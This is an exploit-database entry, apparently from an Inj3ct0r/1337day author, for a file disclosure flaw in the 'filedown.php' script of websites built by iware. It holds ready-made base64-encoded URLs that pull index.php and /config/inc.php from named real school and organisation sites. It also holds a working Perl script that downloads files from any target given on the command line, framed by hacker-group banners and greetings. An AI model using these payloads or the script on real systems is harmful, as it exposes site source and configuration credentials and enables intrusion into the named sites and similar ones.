Designed by: iware <= Remote Information Disclosure Explo



EKU-ID: 167 CVE: OSVDB-ID:
Author: expku Published: 2011-05-09 Verified: Verified
Download:

Rating

Home


Designed by: iware <= Remote Information Disclosure Exploit(Encoded) 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KnocKout member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [~] Live Contact : knockoutr@msn.com [~] E-Mail : knockout@e-mail.com.tr [~] HomePage : http://h4x0resec.blogspot.com - http://1337day.com - http://09EXPLOIT.COM / HTTP://0NTO.ME -------------------------------------------------------- 脼u metriisiiin 枚n眉眉眉眉眉眉眉眉... bir uzunnnnnn alannn... http://www.youtube.com/watch?v=2OeCifsOusw -------------------------------------------------------- ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : Designed by: iware |~Price : N/A |~Version : N/A |~Software: http://www.iware.com.tw/ |~Vulnerability Style : 脻nformation disclosure |~Vulnerability Dir : / |~Google Keyword : N/A |[~]Date : "06.05.2011" |[~]Tested on : DEMOS ---------------------------------------------------------- filedown.php <= 'file' Functions Not Security --------------------------------------------------------- 脻nfo Exploitation / Demos www.straphael.org.tw/filedown.php?file=[DisclosureFile]&site={Encode on base64 Disclosure] ------------------------------------------------------------------------------- www.straphael.org.tw/filedown.php?file=index.php&site=aW5kZXgucGhw http://www.gimse.nutn.edu.tw/filedown.php?file=index.php&site=aW5kZXgucGhw .. Or .. http://www.gimse.nutn.edu.tw/filedown.php?site={Base64 filename} /config/inc.php <= Encoded base64; Y29uZmlnL2luYy5waHA= Exploit ready. http://www.gimse.nutn.edu.tw/filedown.php?site=Y29uZmlnL2luYy5waHA= OK. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Information Disclosure Exploit. =============== DISCLOSURE.PL ================================================= use LWP::Simple; use LWP::UserAgent; system('cls'); system('title HOMEPIMA Design <= Remote Information Disclosure Exploit'); system('color 2'); if(@ARGV < 2) { print "[-]Su Sekilde Kocum. \n\n"; &help; exit(); } sub help() { print "[+] usage1 : perl $0 HedefWeb /path/ \n"; print "[+] usage2 : perl $0 localhost / \n"; } print "\n************************************************************************\n"; print "\* Plinka Design <= Remote (File Disclosure/LFI) Exploit *\n"; print "\* Exploited By : KnocKout *\n"; print "\* Contact : knockoutr[at]msn[dot]com *\n"; print "\* -- *\n"; print "\*********************************************************************\n\n\n"; ($TargetIP, $path, $File,) = @ARGV; $File="filedown.php?site=aW5kZXgucGhw"; my $url = "http://" . $TargetIP . $path . $File; print "\n Az Bekle Sikertiyorum!!! \n\n"; my $useragent = LWP::UserAgent->new(); my $request = $useragent->get($url,":content_file" => "index.php"); if ($request->is_success) { print "[+] $url <= Hedef Site Exploit Edildi!\n\n"; print "[+] OPERASYON TAMAM !\n"; print "[+] Index.php Dosyasi Indirildi (index.php)\n"; print "[+] GRAYHATZ STAR \n"; print "[+] Special tnX # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) # Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * KedAns-Dz # gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ .... \n"; exit(); } else { print "[!] Exploit $url Basarisiz !\n[!] ".$request->status_line."\n"; exit(); } ================================================================ .__ _____ _______ | |__ / | |___ __\ _ \_______ ____ | | \ / | |\ \/ / /_\ \_ __ \_/ __ \ | Y \/ ^ /> <\ \_/ \ | \/\ ___/ |___| /\____ |/__/\_ \\_____ /__| \___ > \/ |__| \/ \/ \/ _____________________________ / _____/\_ _____/\_ ___ \ \_____ \ | __)_ / \ \/ / \ | \\ \____ /_______ //_______ / \______ / \/ \/ \/ Was Here. HTTP://H4X0RESEC.BLOGSOT.COM # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) # Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * KedAns-Dz # gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ .... #